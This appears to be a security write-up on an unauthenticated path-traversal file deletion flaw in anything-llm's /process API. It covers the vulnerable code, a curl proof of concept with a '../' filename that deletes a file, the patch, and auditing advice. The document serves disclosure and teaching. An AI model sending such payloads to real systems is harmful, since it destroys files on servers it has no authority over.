anything-llm-arbitrary-file-deletion

Last updated 1 year ago

Overview

This vulnerability, reported against the [anything-llm] web application, affects the API that the application sets up on port 8888. The API is built with Python and Flask, and it allows any unauthenticated user to delete arbitrary files by sending a POST request to the /process endpoint.

Arbitrary File Deletion via Unvalidated Filename Input in /process Endpoint

Taking a quick look at how the API processes this request:

[..snip..]
from scripts.watch.process_single import process_single

[..snip..]

WATCH_DIRECTORY = "hotdir"
@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = content.get('filename')
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

At a high level, the application parses the JSON body, reads the filename key, and passes its value to the process_single function.

import os
from .filetypes import FILETYPES
from .utils import move_source

RESERVED = ['__HOTDIR__.md']

# This script will do a one-off processing of a specific document that exists in hotdir.
# For this function we remove the original source document since there is no need to keep it and it will
# only occupy additional disk space.
def process_single(directory, target_doc):
  if os.path.isdir(f"{directory}/{target_doc}") or target_doc in RESERVED: return (False, "Not a file")
  
  if os.path.exists(f"{directory}/{target_doc}") is False: 
    print(f"{directory}/{target_doc} does not exist.")
    return (False, f"{directory}/{target_doc} does not exist.")

  filename, fileext = os.path.splitext(target_doc)
  if filename in ['.DS_Store'] or fileext == '': return False
  if fileext == '.lock':
    print(f"{filename} is locked - skipping until unlocked")
    return (False, f"{filename} is locked - skipping until unlocked")

  if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

  FILETYPES[fileext](
    directory=directory,
    filename=filename,
    ext=fileext,
    remove_on_complete=True # remove source document to save disk space.
  )

  return (True, None)

The process_single function shown above performs some basic checks: it rejects directories and reserved names, and it confirms that the requested file exists. It also skips any file with a .lock extension. The interesting case is a file whose extension is not in the FILETYPES allow-list. Instead of being converted, the file is handed to move_source, which is meant to move it to a different directory (failed or processed). As seen below, this branch calls move_source with failed and remove both set to True, and passes target_doc, which is the filename value we sent in the JSON body:

if fileext not in FILETYPES.keys():
    print(f"{fileext} not a supported file type for conversion. It will not be processed.")
    move_source(new_destination_filename=target_doc, failed=True, remove=True)
    return (False, f"{fileext} not a supported file type for conversion. It will not be processed.")

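Looking at the move_source function, we see that when remove is True and the path exists, it calls os.remove on new_destination_filename joined onto working_dir. In the excerpt shown, only remove is checked before the deletion; failed is not consulted. The new_destination_filename parameter is the filename value passed in by the caller in the previous excerpt.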

def move_source(working_dir='hotdir', new_destination_filename='', failed=False, remove=False):
  if remove and os.path.exists(f"{working_dir}/{new_destination_filename}"):
    print(f"{new_destination_filename} deleted from filesystem")
    os.remove(f"{working_dir}/{new_destination_filename}")
    return
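To make the effect of that join concrete, here is a minimal sketch that reproduces only the remove branch inside a throwaway temporary directory. The reduced move_source signature, the victim.conf file name, and the directory layout are assumptions made for illustration; this is not the project's full function.

```python
import os
import tempfile


def move_source(working_dir, new_destination_filename, remove=False):
    # Reduced stand-in for the remove branch shown above (assumption: the
    # rest of the real function is irrelevant to the deletion).
    target = f"{working_dir}/{new_destination_filename}"
    if remove and os.path.exists(target):
        os.remove(target)
        return True
    return False


with tempfile.TemporaryDirectory() as root:
    hotdir = os.path.join(root, "hotdir")
    os.mkdir(hotdir)

    # Hypothetical victim file that lives OUTSIDE hotdir.
    outside = os.path.join(root, "victim.conf")
    with open(outside, "w") as fh:
        fh.write("nameserver 127.0.0.1\n")

    # A single "../" is enough to climb out of hotdir in this layout.
    deleted = move_source(hotdir, "../victim.conf", remove=True)
    still_there = os.path.exists(outside)
    print(deleted, still_there)
```

Because the file name is concatenated onto working_dir without any normalisation, the operating system resolves the ../ segment and the file next to hotdir is removed.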

Proof of Concept

As you may have noticed, the application has no path traversal check or input sanitization on the filename parameter. The exploitable surface is somewhat constrained, but the impact is still high when the target is chosen carefully. The deletion is only triggered when the filename has an extension and that extension is not in the allowed list; otherwise the move_source call is never reached. So ../../../../../../../etc/passwd won't work, because the file has no extension, but ../../../../../../etc/resolv.conf will, because the .conf extension isn't allowed and the request falls through to move_source.

We need the ../ sequences because os.remove(f"{working_dir}/{new_destination_filename}") prefixes the filename with working_dir, which is hotdir, so the payload has to climb out of that directory first.
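The extension constraint and the effect of the hotdir prefix can be checked offline with a small sketch. ALLOWED_EXTS is a hypothetical stand-in for FILETYPES.keys(), whose real contents are not shown in this write-up, and the helper names are made up for illustration. The existence and directory checks from process_single are deliberately left out.

```python
import os

# Hypothetical allow-list; the real FILETYPES keys are not shown here.
ALLOWED_EXTS = {".txt", ".md", ".pdf"}


def reaches_delete_branch(filename, allowed=ALLOWED_EXTS):
    """Mirror the extension checks in process_single (existence checks omitted)."""
    name, ext = os.path.splitext(filename)
    if name in [".DS_Store"] or ext == "":
        return False  # no extension: returns before move_source is called
    if ext == ".lock":
        return False  # locked files are skipped
    return ext not in allowed  # unsupported extension: move_source(remove=True)


def effective_path(filename, working_dir="hotdir"):
    """Show where f"{working_dir}/{filename}" points once '..' is collapsed."""
    return os.path.normpath(f"{working_dir}/{filename}")


for payload in ("../../../../../../../etc/passwd",
                "../../../../../../etc/resolv.conf"):
    print(payload, reaches_delete_branch(payload))
```

The first payload never reaches the deletion because os.path.splitext reports an empty extension for passwd, while the second one does because .conf is not in the allow-list.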

In this case, I will create a file named resolv.conf in the /tmp folder and attempt to delete it:

ζ cp /etc/resolv.conf . 
ζ ls -la resolv.conf 
-rw-r--r-- 1 root root 53 Nov  3 00:30 resolv.conf

ζ curl -X POST -H 'Content-Type: application/json' -d '{"filename":"../../../../../../../tmp/resolv.conf"}' http://localhost:5000/process
{"filename": "../../../../../../../tmp/resolv.conf", "reason": ".conf not a supported file type for conversion. It will not be processed.", "success": false}

Checking the API logs:

python3 wsgi.py
 * Serving Flask app 'api'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
Processing ../../../../../../../tmp/resolv.conf
.conf not a supported file type for conversion. It will not be processed.
../../../../../../../tmp/resolv.conf deleted from filesystem
127.0.0.1 - - [03/Nov/2023 00:30:48] "POST /process HTTP/1.1" 200 -

The file is successfully deleted from the system.

ζ ls -la resolv.conf
ls: cannot access 'resolv.conf': No such file or directory

Fix

A commit was made to the repository to patch this vulnerability. The patched code now sanitizes the filename parameter to strip directory traversal sequences:

import os
from flask import Flask, json, request
from scripts.watch.process_single import process_single
from scripts.watch.filetypes import ACCEPTED_MIMES

@api.route('/process', methods=['POST'])
def process_file():
  content = request.json
  target_filename = os.path.normpath(content.get('filename')).lstrip(os.pardir + os.sep)
  print(f"Processing {target_filename}")
  success, reason = process_single(WATCH_DIRECTORY, target_filename)
  return json.dumps({'filename': target_filename, 'success': success, 'reason': reason})

Here is how the modified code handles the payloads that were used to traverse:

>>> os.pardir
'..'
>>> os.pardir + os.sep
'../'
>>> target_filename = os.path.normpath("../../../../../../../password").lstrip(os.pardir + os.sep)
>>> target_filename
'password'
>>> target_filename = os.path.normpath("../../../../../../../password../../../../../").lstrip(os.pardir + os.sep)
>>> target_filename
''
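One thing to keep in mind when reading the patch is that str.lstrip treats its argument as a set of characters rather than a literal prefix, so it also strips a leading dot from names such as .env.conf. As an alternative, here is a minimal sketch of a containment check that resolves the final path and verifies it stays under the base directory. The resolve_inside helper is hypothetical and is not the fix the project adopted.

```python
import os


def resolve_inside(base_dir, user_filename):
    """Return the resolved path if it stays strictly inside base_dir, else None."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_filename))
    if candidate == base:
        return None  # the directory itself is not a valid target
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:
        inside = False  # e.g. paths on different drives on Windows
    return candidate if inside else None


# lstrip removes any leading '.' or '/' characters, not just "../" prefixes.
stripped = ".env.conf".lstrip("../")

print(resolve_inside("hotdir", "../../tmp/resolv.conf"))
print(stripped)
```

Checking the resolved path also covers absolute paths and symlinks, since os.path.join discards the base when the second argument is absolute and os.path.realpath follows links before the comparison.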

How to Identify Similar Vulnerabilities?

This vulnerability is caused by improper input validation, but the broader lesson is to examine how the application processes files, especially when any part of that processing can be controlled by the user. What raises the impact here is that the /process action can be performed unauthenticated; a critical action like this should require some form of authentication when it is offered by an API. The best way to look for this kind of vulnerability is to enumerate all the file-based actions the application performs and check whether we can control any aspect of them. It helps to narrow the search down to functions that handle file operations, some of which are listed below.

This is not an exhaustive list, as anyone can write their own functions that wrap the following functions or others.

open()
close()
read()
write()
readline()
seek()
tell()
flush()

Modules:

os
shutil
pathlib
io
csv
json
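As a starting point for that kind of review, the following sketch uses Python's ast module to list calls to a few file-related sinks in a piece of source code. The FILE_SINKS set and the helper names are illustrative assumptions, not a complete audit tool, and wrappers or aliased imports would need extra handling.

```python
import ast

# Illustrative, non-exhaustive sink list; extend it for the codebase under review.
FILE_SINKS = {"open", "os.remove", "os.unlink", "os.rename",
              "shutil.rmtree", "shutil.move"}


def dotted_name(node):
    """Rebuild names like 'os.remove' from a call target; None if not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_file_sinks(source):
    """Return sorted (line_number, call_name) pairs for calls to known sinks."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in FILE_SINKS:
                hits.append((node.lineno, name))
    return sorted(hits)


sample = '''
import os
def move_source(working_dir, name, remove=False):
    if remove and os.path.exists(f"{working_dir}/{name}"):
        os.remove(f"{working_dir}/{name}")
'''
hits = find_file_sinks(sample)
print(hits)
```

Each hit is only a lead: the next step is to trace the arguments of the flagged call back to see whether any of them come from request data.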
